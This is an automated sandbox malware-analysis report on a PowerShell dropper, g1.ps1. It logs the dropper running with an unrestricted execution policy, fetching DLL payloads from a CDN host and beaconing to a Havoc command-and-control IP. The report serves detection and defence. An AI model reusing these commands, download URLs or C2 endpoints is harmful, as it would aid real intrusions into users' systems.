Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
g1.ps1

Overview

General Information

Sample name:g1.ps1
Analysis ID:1578250
MD5:78e07513650c1a45dcd2b15ab20d3691
SHA1:6066bd405222b5ebf50910dca44864f76bdc34ae
SHA256:6750a7e6eb02eecab234f42a6cc6a88c1510d557336d53a85c02ad43776d8cb9
Tags:ps1ScamTransaction7350user-JAMESWT_MHT
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Powershell drops PE file
Sets debug register (to hijack the execution of another thread)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 5324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Onedrive.exe (PID: 5036 cmdline: "C:\Users\user\AppData\Local\Temp\Onedrive.exe" MD5: 32C31F06E0B68F349F68AFDD08E45F3D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", ProcessId: 5324, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", ProcessId: 5324, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T13:36:22.689457+010020565391Malware Command and Control Activity Detected192.168.2.54970947.84.196.148443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T13:36:16.330798+010028032742Potentially Bad Traffic192.168.2.54970689.35.237.17080TCP
2024-12-19T13:36:18.473200+010028032742Potentially Bad Traffic192.168.2.54970789.35.237.170443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: unknownHTTPS traffic detected: 89.35.237.170:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49983 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: Binary string: C:\Users\dell\Downloads\tamperedsyscallshellcodeinfile\x64\Release\tampered.pdb source: Onedrive.exe, 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmp, sppc.dll.0.dr
Source: Binary string: phoneactivate.pdb source: powershell.exe, 00000000.00000002.2268244875.0000022F7F419000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe, 00000003.00000000.2233891547.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe.0.dr
Source: Binary string: phoneactivate.pdbGCTL source: powershell.exe, 00000000.00000002.2268244875.0000022F7F419000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe, 00000003.00000000.2233891547.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A0327470 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,3_2_00007FF8A0327470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2056539 - Severity 1 - ET MALWARE Havoc Demon CnC Request : 192.168.2.5:49709 -> 47.84.196.148:443
Source: Joe Sandbox ViewIP Address: 89.35.237.170 89.35.237.170
Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 89.35.237.170:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 89.35.237.170:443
Source: global trafficHTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 282Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: global trafficHTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global trafficHTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global trafficDNS traffic detected: DNS query: bangla.b-cdn.net
Source: unknownHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 282Host: 47.84.196.148
Source: powershell.exe, 00000000.00000002.2238529101.0000022F0195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F016B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bangla.b-cdn.net
Source: powershell.exe, 00000000.00000002.2238529101.0000022F016B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bangla.b-cdn.net/onedrive.dll
Source: powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bangla.b-cdn.net/sppc.dll
Source: powershell.exe, 00000000.00000002.2256795044.0000022F101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Onedrive.exeString found in binary or memory: http://schemas.mic
Source: powershell.exe, 00000000.00000002.2238529101.0000022F00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2266730581.0000022F7F1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604709979.0000021BD8DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/
Source: Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/GZ;~
Source: Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/V
Source: Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/o
Source: Onedrive.exe, 00000003.00000003.3901525733.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137274150.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3901565556.0000021BD8DC7000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604903050.0000021BD8DAF000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3901688629.0000021BD8DCC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3136786618.0000021BD8DCA000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3901734447.0000021BD8D89000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323944839.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4324280737.0000021BD8DAF000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.2965471763.0000021BD8DC7000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604759616.0000021BD8D9B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D08000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3901434763.0000021BD8D9E000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4567512777.0000021BD8DB0000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137481473.0000021BD8DCD000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323820077.0000021BD8D9E000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4324317853.0000021BD8D89000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/reports
Source: Onedrive.exe, 00000003.00000002.4567512777.0000021BD8DB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/reports=
Source: Onedrive.exe, 00000003.00000003.4324280737.0000021BD8DAF000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323820077.0000021BD8D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/reportsF
Source: Onedrive.exe, 00000003.00000003.3136786618.0000021BD8DCA000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.2965471763.0000021BD8DC7000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137481473.0000021BD8DCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/reportsX
Source: Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148:443/reports
Source: powershell.exe, 00000000.00000002.2238529101.0000022F00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bangla.b-cdn.net
Source: powershell.exe, 00000000.00000002.2238529101.0000022F01942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bangla.b-cdn.net/onedrive.dll
Source: powershell.exe, 00000000.00000002.2238529101.0000022F0195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bangla.b-cdn.net/sppc.dll
Source: powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2238529101.0000022F014D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2256795044.0000022F101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownHTTPS traffic detected: 89.35.237.170:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49983 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49985 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\sppc.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Onedrive.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_3_0000021BD8F80020 NtAllocateVirtualMemory,NtProtectVirtualMemory,3_3_0000021BD8F80020
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A0301010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle,3_2_00007FF8A0301010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A0301960 NtAccessCheck,3_2_00007FF8A0301960
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_3_0000021BD8F8876F3_3_0000021BD8F8876F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_3_0000021BD8F8A71A3_3_0000021BD8F8A71A
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_3_0000021BD8F958AF3_3_0000021BD8F958AF
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_3_0000021BD8F80BDF3_3_0000021BD8F80BDF
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_3_0000021BD8F8C13F3_3_0000021BD8F8C13F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_3_0000021BD8F9764F3_3_0000021BD8F9764F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F13843_2_00007FF6104F1384
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104FD98C3_2_00007FF6104FD98C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104FC2143_2_00007FF6104FC214
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F8E4C3_2_00007FF6104F8E4C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F5E743_2_00007FF6104F5E74
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F7B1C3_2_00007FF6104F7B1C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104FA33C3_2_00007FF6104FA33C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F70103_2_00007FF6104F7010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F57D03_2_00007FF6104F57D0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104FACA43_2_00007FF6104FACA4
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F64543_2_00007FF6104F6454
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104FE0483_2_00007FF6104FE048
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F892C3_2_00007FF6104F892C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F8CE03_2_00007FF6104F8CE0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A031B5A03_2_00007FF8A031B5A0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A03010103_2_00007FF8A0301010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A031A3103_2_00007FF8A031A310
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A03323A03_2_00007FF8A03323A0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A031C6DE3_2_00007FF8A031C6DE
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A031A8F03_2_00007FF8A031A8F0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A03019603_2_00007FF8A0301960
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A031C9803_2_00007FF8A031C980
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A0302B003_2_00007FF8A0302B00
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A031BDC03_2_00007FF8A031BDC0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A031AD913_2_00007FF8A031AD91
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sppc.dll 758BB067ECC1D7832D1B389CFA85B70376645694C60B5D017747B1E1664CB2F6
